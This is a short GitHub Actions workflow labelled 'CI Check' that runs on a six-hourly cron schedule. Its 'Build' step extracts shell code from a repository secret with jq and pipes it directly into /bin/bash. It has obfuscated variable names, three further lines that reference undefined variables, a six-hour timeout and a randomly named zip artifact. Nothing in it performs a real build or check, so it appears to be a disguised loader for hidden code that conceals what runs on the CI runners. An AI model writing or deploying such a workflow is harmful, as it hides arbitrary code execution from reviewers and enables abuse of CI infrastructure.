name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '50 2,8,14,20 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  operation:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build
        env:
          rgv4211: ${{ secrets.rgv4211 }}
        run: |
          printf '%s' "$rgv4211" | jq -r .n416 | /bin/bash
          printf '%s' "$l7" | jq -r .e5 | /bin/bash
          printf '%s' "$kt548" | jq -r .y4549 | /bin/bash
          printf '%s' "$h56" | jq -r .sj942 | /bin/bash

      - name: Archive output
        uses: actions/upload-artifact@v4
        with:
          name: eTiqFZqa
          path: "*.zip"
          retention-days: 1
